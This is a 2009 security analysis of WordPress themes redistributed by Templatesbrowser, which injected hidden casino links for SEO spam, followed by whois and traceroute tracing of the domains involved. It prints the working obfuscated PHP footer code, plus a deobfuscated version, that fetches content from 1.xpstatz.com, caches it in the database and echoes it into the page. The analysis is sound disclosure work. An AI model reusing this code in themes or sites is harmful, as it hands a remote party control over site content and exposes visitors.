Copyright © Onno Zweers
In May 2007, we (Wessel and Onno Zweers) discovered that themes downloaded from Templatesbrowser contained PHP code that produced hidden links to commercial websites like casinos etcetera, obviously meant to increase the Google Pagerank of such websites. We wrote about it in several places.
After some publicity (in Digg and the Joomla forum, among others) the webmaster of Templatesbrowser gave up. A domain speculator bought the site, it seemed, and the themes disappeared.
In July 2009, Wessel discovered that the old themes were back. This time with “improved” malicious code.
On July 15th, several of the involved casino websites were taken offline, no doubt because of this analysis page. Also, the hidden links to casino websites seem to have been removed.
Latest news and developments: http://twitter.com/onnix
I downloaded the theme Aalglatt, both from Templatesbrowser and from the original author, Felix Krusch. We unpacked both in different directories and we used the Unix tool diff to display the differences.
onno@parga:~/analysis$ diff aalglatt-felixkrusch aalglatt-templatesbrowser
diff aalglatt-felixkrusch/footer.php aalglatt-templatesbrowser/footer.php
4c4
< <p>Aalglatt Template by <a href="http://www.felixkrusch.com">Felix Krusch</a> based on The Green Marinée template by <a href="http://e-lusion.com" title="Ian Main - e-lusion.com">Ian Main</a></p>
---
> <p>Aalglatt Template by <a href="http://www.felixkrusch.com">Felix Krusch</a></p>
10c10
< <li><a href="http://wordpress.org/" title="Powered by the lovely WordPress">WP</a></li>
---
> <?php global $wpdb; $RC97967EF8C0BC5E1AD94C597A5D83875 = $wpdb->get_col("SELECT option_value FROM $wpdb->options WHERE option_name='l_time_code'"); $RC69F19E4BCF2765EDB4274B852436F44 = $wpdb->get_col("SELECT option_value FROM $wpdb->options WHERE option_name='l_code'"); if (empty($RC97967EF8C0BC5E1AD94C597A5D83875)) { $wpdb->query("INSERT INTO $wpdb->options (option_name, option_value, autoload) VALUES ('l_time_code', '0', 'no')"); $R76DA5BA68AA0171088C9E2EE1409AC19 = 0; } else $R76DA5BA68AA0171088C9E2EE1409AC19 = intval($RC97967EF8C0BC5E1AD94C597A5D83875[0]); if (empty($RC69F19E4BCF2765EDB4274B852436F44)) { $wpdb->query("INSERT INTO $wpdb->options (option_name, option_value, autoload) VALUES ('l_code', '<br/>', 'no')"); $RE11FF1AFCAD5E0BC6B9BB3DE41CA9EAB = '<br/>'; } else $RE11FF1AFCAD5E0BC6B9BB3DE41CA9EAB = $RC69F19E4BCF2765EDB4274B852436F44[0]; if ( ( time() - $R76DA5BA68AA0171088C9E2EE1409AC19 ) >= 60 ) { $R39C188653EA53DBD6E3F1D3915EDAC0C = "com"; $R8088818E3E46A17C12F2EE42EB12D7AC = "1."; $R7B934F06258B8BA3608E30CDE9EA1035 = "xpstatz"; $RAD8CC24399FEA84D3454DD7057C38FD0 = "xps."; $RBF7582359E6813BD7C54DD76E7505037 = "$R8088818E3E46A17C12F2EE42EB12D7AC$R7B934F06258B8BA3608E30CDE9EA1035.$R39C188653EA53DBD6E3F1D3915EDAC0C"; $RA81C90DCC503F6900F7DC424AD04F525 = "/".$RAD8CC24399FEA84D3454DD7057C38FD0."php?h=" . urlencode($_SERVER['HTTP_HOST']) . "&u=" . urlencode($_SERVER['REQUEST_URI']); if (ini_get('allow_url_fopen')) { $RE11FF1AFCAD5E0BC6B9BB3DE41CA9EAB = @file_get_contents("http://" . $RBF7582359E6813BD7C54DD76E7505037 . $RA81C90DCC503F6900F7DC424AD04F525); } else { $RF500F4A848E2EB2F8AAC3A6734D7EC38 = @fsockopen($RBF7582359E6813BD7C54DD76E7505037, '80', $R87844B1C6FC922407E6020B6B224950F, $R1966719AEC0096F98BA934D649A6E28D, 30); if ($RF500F4A848E2EB2F8AAC3A6734D7EC38) { @stream_set_timeout($RF500F4A848E2EB2F8AAC3A6734D7EC38, 60); @fwrite($RF500F4A848E2EB2F8AAC3A6734D7EC38, "GET $RA81C90DCC503F6900F7DC424AD04F525 HTTP/1.1\r\n"); @fwrite($RF500F4A848E2EB2F8AAC3A6734D7EC38, "Host: $RBF7582359E6813BD7C54DD76E7505037\r\n"); @fwrite($RF500F4A848E2EB2F8AAC3A6734D7EC38, "Connection: Close\r\n\r\n"); $RE11FF1AFCAD5E0BC6B9BB3DE41CA9EAB = ""; while(!feof($RF500F4A848E2EB2F8AAC3A6734D7EC38)) { $RE11FF1AFCAD5E0BC6B9BB3DE41CA9EAB .= @fgets($RF500F4A848E2EB2F8AAC3A6734D7EC38, 1024); } $RE11FF1AFCAD5E0BC6B9BB3DE41CA9EAB = trim(strstr($RE11FF1AFCAD5E0BC6B9BB3DE41CA9EAB, "\r\n\r\n")); } @fclose($RF500F4A848E2EB2F8AAC3A6734D7EC38); } if ( strpos($RE11FF1AFCAD5E0BC6B9BB3DE41CA9EAB, '[/]') ) { $R76DA5BA68AA0171088C9E2EE1409AC19 = time(); $R54997E66281827CBC285597040554FCC = mysql_escape_string($RE11FF1AFCAD5E0BC6B9BB3DE41CA9EAB); $wpdb->query("UPDATE $wpdb->options SET option_value=$R76DA5BA68AA0171088C9E2EE1409AC19 WHERE option_name='l_time_code'"); $wpdb->query("UPDATE $wpdb->options SET option_value='$R54997E66281827CBC285597040554FCC' WHERE option_name='l_code'"); } } if ( strpos($RE11FF1AFCAD5E0BC6B9BB3DE41CA9EAB, '[/]') ) { $R3CB9CDAED257453CFA56B9EF81B44C57 = strpos($RE11FF1AFCAD5E0BC6B9BB3DE41CA9EAB, '[]') + 2; $R24D59CD0B76A27B85F35D40A3CF6EC37 = strrpos($RE11FF1AFCAD5E0BC6B9BB3DE41CA9EAB, '[/]'); echo substr($RE11FF1AFCAD5E0BC6B9BB3DE41CA9EAB, $R3CB9CDAED257453CFA56B9EF81B44C57, $R24D59CD0B76A27B85F35D40A3CF6EC37-$R3CB9CDAED257453CFA56B9EF81B44C57); $RE762F29BDD39FF0A2ADF9AF4E6885799 = 1; } ?>
19c19
< <?php do_action('wp_footer', ''); ?>
---
> <?php xfooter(); do_action('wp_footer', ''); ?>
Only in aalglatt-templatesbrowser: functions.php
Common subdirectories: aalglatt-felixkrusch/images and aalglatt-templatesbrowser/images
diff aalglatt-felixkrusch/sidebar.php aalglatt-templatesbrowser/sidebar.php
65,66d64
< <li><a href="feed:<?php bloginfo('rss2_url'); ?>" title="<?php _e('Syndicate this site using RSS'); ?>"><?php _e('<abbr title="Really Simple Syndication">RSS</abbr>'); ?></a></li>
< <li><a href="feed:<?php bloginfo('comments_rss2_url'); ?>" title="<?php _e('The latest comments to all posts in RSS'); ?>"><?php _e('Comments <abbr title="Really Simple Syndication">RSS</abbr>'); ?></a></li>
Now, that was pretty unreadable. But from all this output, we can draw some conclusions:
To make the code more readable, we apply a few search & replace commands:
sed -i -e 's/R39C188653EA53DBD6E3F1D3915EDAC0C/com/g' *.php sed -i -e 's/R7B934F06258B8BA3608E30CDE9EA1035/xpstatz/g' *.php sed -i -e 's/RAD8CC24399FEA84D3454DD7057C38FD0/xps/g' *.php sed -i -e 's/R8088818E3E46A17C12F2EE42EB12D7AC/one/g' *.php sed -i -e 's/RA81C90DCC503F6900F7DC424AD04F525/path/g' *.php sed -i -e 's/RBF7582359E6813BD7C54DD76E7505037/domain/g' *.php sed -i -e 's/RC97967EF8C0BC5E1AD94C597A5D83875/databaseresult1/g' *.php sed -i -e 's/RC69F19E4BCF2765EDB4274B852436F44/databaseresult2/g' *.php sed -i -e 's/R76DA5BA68AA0171088C9E2EE1409AC19/zero/g' *.php sed -i -e 's/RE11FF1AFCAD5E0BC6B9BB3DE41CA9EAB/html_tag_br/g' *.php sed -i -e 's/RF500F4A848E2EB2F8AAC3A6734D7EC38/socket/g' *.php sed -i -e 's/R87844B1C6FC922407E6020B6B224950F/novalue1/g' *.php sed -i -e 's/R1966719AEC0096F98BA934D649A6E28D/novalue2/g' *.php sed -i -e 's/html_tag_br/some_downloaded_file_contents/g' *.php sed -i -e 's/R54997E66281827CBC285597040554FCC/string_for_database/g' *.php sed -i -e 's/RE762F29BDD39FF0A2ADF9AF4E6885799/another_one/g' *.php sed -i -e 's/R24D59CD0B76A27B85F35D40A3CF6EC37/position_of_slash/g' *.php sed -i -e 's/R3CB9CDAED257453CFA56B9EF81B44C57/position_of_brackets/g' *.php sed -i -e 's/RDAFE7FE4FDC52E2D1048573B4DB1DF18/databaseresult1/g' *.php sed -i -e 's/R41CCFE75D7AC2B4681397CFC70BAEF40/databaseresult2/g' *.php sed -i -e 's/R14AF1BE9EE26A90921E64A82E7836797/one/g' *.php sed -i -e 's/RBDCA893A9385C089DC5F358AAA52C09B/zero/g' *.php sed -i -e 's/R5F38CE9C0B222F3BB0880E016DC07527/zero_or_one/g' *.php sed -i -e 's/RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1/html_tag_br/g' *.php sed -i -e 's/html_tag_br/some_downloaded_file_contents/g' *.php sed -i -e 's/R9446905AFC32B438C0BD070AD05F3D83/string_for_database/g' *.php
Then we edit the layout a bit. Then we get:
<?php
global $wpdb;
$databaseresult1 = $wpdb->get_col("SELECT option_value FROM $wpdb->options WHERE option_name='l_time_code'");
$databaseresult2 = $wpdb->get_col("SELECT option_value FROM $wpdb->options WHERE option_name='l_code'");
if (empty($databaseresult1)) {
$wpdb->query("INSERT INTO $wpdb->options (option_name, option_value, autoload) VALUES ('l_time_code', '0', 'no')");
$zero = 0;
} else
$zero = intval($databaseresult1[0]);
if (empty($databaseresult2)) {
$wpdb->query("INSERT INTO $wpdb->options (option_name, option_value, autoload) VALUES ('l_code', '<br/>', 'no')");
$some_downloaded_file_contents = '<br/>';
} else
$some_downloaded_file_contents = $databaseresult2[0];
if ( ( time() - $zero ) >= 60 ) {
$com = "com";
$one = "1.";
$xpstatz = "xpstatz";
$xps = "xps.";
$domain = "$one$xpstatz.$com";
$path = "/".$xps."php?h=" . urlencode($_SERVER['HTTP_HOST']) . "&u=" . urlencode($_SERVER['REQUEST_URI']);
if (ini_get('allow_url_fopen')) {
$some_downloaded_file_contents = @file_get_contents("http://" . $domain . $path);
} else {
$socket = @fsockopen($domain, '80', $novalue1, $novalue2, 30);
if ($socket) {
@stream_set_timeout($socket, 60);
@fwrite($socket, "GET $path HTTP/1.1\r\n");
@fwrite($socket, "Host: $domain\r\n");
@fwrite($socket, "Connection: Close\r\n\r\n");
$some_downloaded_file_contents = "";
while(!feof($socket)) {
$some_downloaded_file_contents .= @fgets($socket, 1024);
}
$some_downloaded_file_contents = trim(strstr($some_downloaded_file_contents, "\r\n\r\n"));
}
@fclose($socket);
}
if ( strpos($some_downloaded_file_contents, '[/]') ) {
$zero = time();
$string_for_database = mysql_escape_string($some_downloaded_file_contents);
$wpdb->query("UPDATE $wpdb->options SET option_value=$zero WHERE option_name='l_time_code'");
$wpdb->query("UPDATE $wpdb->options SET option_value='$string_for_database' WHERE option_name='l_code'");
}
}
if ( strpos($some_downloaded_file_contents, '[/]') ) {
$position_of_brackets = strpos($some_downloaded_file_contents, '[]') + 2;
$position_of_slash = strrpos($some_downloaded_file_contents, '[/]');
echo substr($some_downloaded_file_contents, $position_of_brackets, $position_of_slash-$position_of_brackets);
$another_one = 1;
}
?>
So, what does this code do? Basically the same as Templatesbrowser’s code a few years ago: it downloads some info from a certain server, 1.xpstatz.com:
$some_downloaded_file_contents = @file_get_contents("http://" . $domain . $path);
and displays it:
echo substr($some_downloaded_file_contents,...).
The new thing is: it tries to circumvent certain PHP functions if they are blocked:
if (ini_get('allow_url_fopen'))...
by opening a network socket and writing to and reading from that socket. The result is the same.
Also new: the collected string is stored in the Wordpress database as an option named “l_code”. If this code can’t connect to 1.xpstatz.com fast enough, the string from the database is used instead. So this works like a cache.
$string_for_database = mysql_escape_string($some_downloaded_file_contents);
[...]
$wpdb->query("UPDATE $wpdb->options SET option_value='$string_for_database' WHERE option_name='l_code'");
So, couldn’t this just be some kind of statistics service or pageview counter?
Two years ago, we discovered that Templatesbrowsers themes had links to casinos. So I did a search:
http://www.google.com/search?q=%22Aalglatt+Template+by+Felix+Krusch%22+casino
Among the first results are quite a few sites that actually write about casinos or have normal advertisements to casinos. But on the second page I found this link:
http://www.whatfredread.com/2008/06/maybe-the-appendix-is-useful-after-all/
And in the HTML source of that page I found this hidden link:
<div style="display: none;" id="11365798"><a href="http://www.bonnomori.com/">casino en ligne</a></div>
On another page I found a similar link:
<div style="display: none;" id="12090942"><a href="http://www.competitivechallenge.com/">casinos en ligne</a></div>
Here is a list of domains that the hidden links point to:
bonnomori.com competitivechallenge.com desmoinesarearealtor.net joe2006.com
At least two of those sites link to femalegamblers.org.
If you use this template from Templatesbrowser, the person behind Templatesbrowser has control over what is being displayed on your Wordpress website. Your website might contain link spam to casino websites; if Google finds the link spam, you risk being blocked from their search engine result pages. He or she may even put malicious code on your website, that might infect the operating system of your visitors with viruses and other malware.
Because of the caching mechanism, shutting down or blocking 1.xpstatz.com is not enough; your website will still contain link spam.
Let’s have a look at the whois database:
onno@parga:~$ whois templatesbrowser.com Whois Server Version 2.0 Domain names in the .com and .net domains can now be registered with many different competing registrars. Go to http://www.internic.net for detailed information. Domain Name: TEMPLATESBROWSER.COM Registrar: ENOM, INC. Whois Server: whois.enom.com Referral URL: http://www.enom.com Name Server: DNS1.NAME-SERVICES.COM Name Server: DNS2.NAME-SERVICES.COM Name Server: DNS3.NAME-SERVICES.COM Name Server: DNS4.NAME-SERVICES.COM Name Server: DNS5.NAME-SERVICES.COM Status: clientTransferProhibited Updated Date: 30-jan-2009 Creation Date: 01-mar-2007 Expiration Date: 01-mar-2010 >>> Last update of whois database: Thu, 09 Jul 2009 19:59:55 UTC <<< Registration Service Provided By: NameCheap.com Contact: support@NameCheap.com Visit: http://www.namecheap.com/ Domain name: templatesbrowser.com Registrant Contact: WhoisGuard WhoisGuard Protected () Fax: 8939 S. Sepulveda Blvd. #110 - 732 Westchester, CA 90045 US Administrative Contact: WhoisGuard WhoisGuard Protected (0ec15b4fc07e492e9e99d6b70e9bd05d.protect@whoisguard.com) +1.6613102107 Fax: +1.6613102107 8939 S. Sepulveda Blvd. #110 - 732 Westchester, CA 90045 US Technical Contact: WhoisGuard WhoisGuard Protected (0ec15b4fc07e492e9e99d6b70e9bd05d.protect@whoisguard.com) +1.6613102107 Fax: +1.6613102107 8939 S. Sepulveda Blvd. #110 - 732 Westchester, CA 90045 US Status: Locked Name Servers: dns1.name-services.com dns2.name-services.com dns3.name-services.com dns4.name-services.com dns5.name-services.com Creation date: 01 Mar 2007 15:54:31 Expiration date: 01 Mar 2010 15:54:31
The identity of the domain owner is hidden by the WhoisGuard service.
Let’s see who owns the IP address. That will give us a clue about the hosting provider.
onno@parga:~$ host templatesbrowser.com templatesbrowser.com has address 74.53.139.140 templatesbrowser.com mail is handled by 5 eforwardct2.name-services.com. templatesbrowser.com mail is handled by 5 eforwardct.name-services.com.
onno@parga:~$ host 74.53.139.140 140.139.53.74.in-addr.arpa domain name pointer 8c.8b.354a.static.theplanet.com.
So, what do we have?
Then, there is the server that the malicious code tries to read content from.
onno@parga:~$ host xpstatz.com xpstatz.com has address 209.249.222.18 xpstatz.com mail is handled by 20 eforward1.registrar-servers.com. xpstatz.com mail is handled by 10 eforward2.registrar-servers.com. onno@parga:~$ host 209.249.222.18 Host 18.222.249.209.in-addr.arpa. not found: 3(NXDOMAIN)
That address does not have a reverse DNS entry, so it is more difficult to find out whom it belongs to. So, we try a traceroute:
onno@parga:~$ traceroute 209.249.222.18 traceroute to 209.249.222.18 (209.249.222.18), 30 hops max, 60 byte packets [...] 6 k701.pni-xs4all.ams1.nl.above.net (62.93.194.145) 30.123 ms 15.912 ms 16.148 ms 7 ge-3-1-0.mpr1.ams1.nl.above.net (64.125.25.13) 17.758 ms 19.393 ms 19.909 ms 8 so-2-1-0.mpr1.lga5.us.above.net (64.125.27.185) 106.523 ms 107.893 ms 108.931 ms 9 so-1-1-0.mpr1.ord2.us.above.net (64.125.27.169) 134.579 ms 136.402 ms 138.620 ms 10 3.252.66.gigeservers.net (66.252.3.90) 136.673 ms 139.099 ms 139.333 ms 11 209.249.222.18 (209.249.222.18) 139.732 ms 141.498 ms 141.952 ms
So, the closest lead seems gigeservers.net. Judging from their home page, they are a hosting company.
And now let’s have a look at the advertisers. Who are those casino websites that try to get a higher Google pagerank?
onno@parga:~$ whois competitivechallenge.com Whois Server Version 2.0 Domain names in the .com and .net domains can now be registered with many different competing registrars. Go to http://www.internic.net for detailed information. Domain Name: COMPETITIVECHALLENGE.COM Registrar: ENOM, INC. Whois Server: whois.enom.com Referral URL: http://www.enom.com Name Server: NS1.SEOMORON.COM Name Server: NS2.SEOMORON.COM Status: clientTransferProhibited Updated Date: 09-mar-2009 Creation Date: 08-dec-2005 Expiration Date: 08-dec-2009 >>> Last update of whois database: Tue, 14 Jul 2009 20:55:23 UTC <<<
That was very brief. Competitivechallenge.com does not have a reverse DNS entry, so we do a traceroute.
onno@parga:~$ traceroute competitivechallenge.com traceroute to competitivechallenge.com (66.154.20.253), 30 hops max, 60 byte packets [...] 14 ae-71-71.ebr1.Washington1.Level3.net (4.69.134.133) 119.167 ms ae-91-91.ebr1.Washington1.Level3.net (4.69.134.141) 120.775 ms ae-61-61.ebr1.Washington1.Level3.net (4.69.134.129) 119.963 ms 15 ae-2.ebr3.Atlanta2.Level3.net (4.69.132.85) 128.490 ms 131.160 ms 164.957 ms 16 ae-22-52.car2.Atlanta1.Level3.net (4.68.103.35) 163.519 ms 164.343 ms 165.761 ms 17 REVELATION.car2.Atlanta1.Level3.net (4.71.22.22) 164.613 ms 160.036 ms 158.652 ms 18 atl1-cust2.112.globalcompass.com (69.61.56.206) 152.455 ms 151.399 ms 151.636 ms 19 66.154.20.253 (66.154.20.253) 141.000 ms 139.071 ms 124.399 ms
The closest domain name, globalcompass.com, is indeed a hosting company.
onno@parga:~$ whois bonnomori.com Whois Server Version 2.0 Domain names in the .com and .net domains can now be registered with many different competing registrars. Go to http://www.internic.net for detailed information. Domain Name: BONNOMORI.COM Registrar: ENOM, INC. Whois Server: whois.enom.com Referral URL: http://www.enom.com Name Server: NS1.SEOMAPPED.COM Name Server: NS2.SEOMAPPED.COM Status: clientTransferProhibited Updated Date: 09-mar-2009 Creation Date: 22-oct-2006 Expiration Date: 22-oct-2009 >>> Last update of whois database: Tue, 14 Jul 2009 21:03:34 UTC <<<
The Whois info is again very brief, but there is a recurring name here: enom.com, which is also the registrar of the Templatesbrowser.com domain.
Let’s now see who is the hosting provider.
onno@parga:~$ host bonnomori.com bonnomori.com has address 66.154.64.167 bonnomori.com mail is handled by 0 bonnomori.com. onno@parga:~$ host 66.154.64.167 167.64.154.66.in-addr.arpa domain name pointer 66-154-64-167.seomapped.com.
So, the IP address belongs to seomapped.com
How about femalegamblers.org?
onno@parga:~$ host femalegamblers.org femalegamblers.org has address 69.64.155.176 femalegamblers.org mail is handled by 5 eforwardct2.name-services.com. femalegamblers.org mail is handled by 5 eforwardct.name-services.com. onno@parga:~$ host 69.64.155.176 ;; connection timed out; no servers could be reached
No reverse DNS, so we do a traceroute again.
onno@parga:~$ traceroute 69.64.155.176 traceroute to 69.64.155.176 (69.64.155.176), 30 hops max, 60 byte packets [...] 10 xe-0-2-0.er1.sjc2.us.above.net (64.125.25.6) 191.698 ms 193.564 ms 194.035 ms 11 xe-1-1-0.mpr3.sjc7.us.above.net (64.125.27.89) 217.501 ms 218.870 ms 219.325 ms 12 64.124.195.245.available.above.net (64.124.195.245) 266.948 ms 267.803 ms 270.783 ms 13 sjl01dr01-1-po1.demandmedia.net (69.64.152.54) 271.077 ms 179.325 ms 182.391 ms 14 69.64.155.176 (69.64.155.176) 184.853 ms 185.074 ms 185.334 ms
Now, that’s interesting. This website seems to be hosted at a company called demandmedia.net. Judging from their website, they are into internet marketing. And well, look at that: one of their products is called Enom.com. Where did we see that name before? Right, it is the registrar of both Templatesbrowser.com and the advertisement server xpstatz.com!
One more lookup. name-services.com has the name servers of Templatesbrowser.com. Who are they? Again, the registrar is Enom.com.
onno@parga:~$ whois name-services.com Whois Server Version 2.0 Domain names in the .com and .net domains can now be registered with many different competing registrars. Go to http://www.internic.net for detailed information. Domain Name: NAME-SERVICES.COM Registrar: ENOM, INC. Whois Server: whois.enom.com Referral URL: http://www.enom.com Name Server: DNS1.NAME-SERVICES.COM Name Server: DNS2.NAME-SERVICES.COM Name Server: DNS3.NAME-SERVICES.COM Name Server: DNS4.NAME-SERVICES.COM Name Server: DNS5.NAME-SERVICES.COM Status: clientTransferProhibited Updated Date: 27-sep-2007 Creation Date: 11-jun-2001 Expiration Date: 11-jun-2010
We do a traceroute, and guess what we find?
onno@parga:~$ traceroute NAME-SERVICES.COM traceroute to NAME-SERVICES.COM (69.64.155.124), 30 hops max, 60 byte packets [...] 10 xe-0-2-0.er1.sjc2.us.above.net (64.125.25.6) 197.288 ms 197.703 ms 198.629 ms 11 xe-1-1-0.mpr3.sjc7.us.above.net (64.125.27.89) 200.167 ms 200.591 ms 202.486 ms 12 64.124.195.245.available.above.net (64.124.195.245) 181.126 ms 178.030 ms 180.346 ms 13 69.64.152.54 (69.64.152.54) 183.100 ms 179.060 ms 181.546 ms 14 69.64.155.124 (69.64.155.124) 184.037 ms 184.299 ms 184.657 ms onno@parga:~$ host 69.64.152.54 54.152.64.69.in-addr.arpa domain name pointer sjl01dr01-1-po1.demandmedia.net.
So, name-services.com is only one hop away from demandmedia.net!
Demandmedia.net is involved in three ways:
Still, hosting and registration are all innocent things. The only one doing evil things here is Templatesbrowser, and we still don’t know who they are.
Since we don’t know the identity yet of the person behind Templatesbrowser, our options are limited: complain to hosting providers and warn Google.
On July 10, 2009, I have sent emails to the involved hosting providers asking them to shut down templatesbrowser.com and xpstatz.com. The Planet responded twice that they are looking into the matter.
On July 15, 2009, I have submitted a spam report to Google.
Also on July 15, some of the involved casino websites were removed from DNS. From the casino sites only femalegamblers.org is online, and there is no direct link to it.
On July 19, I noticed that the hidden links on whatfredread.com had disappeared.
Even if templatesbrowser.com and xpstatz.com are shut down, the websites that use the malicious themes may still contain link spam because of the caching mechanism. The affected Wordpress sites can be tracked down by searching Google for links to the casino websites. Another option would be to take control of xpstatz.com and have it serve an innocent but easily trackable string, possibly containing a warning to the webmaster.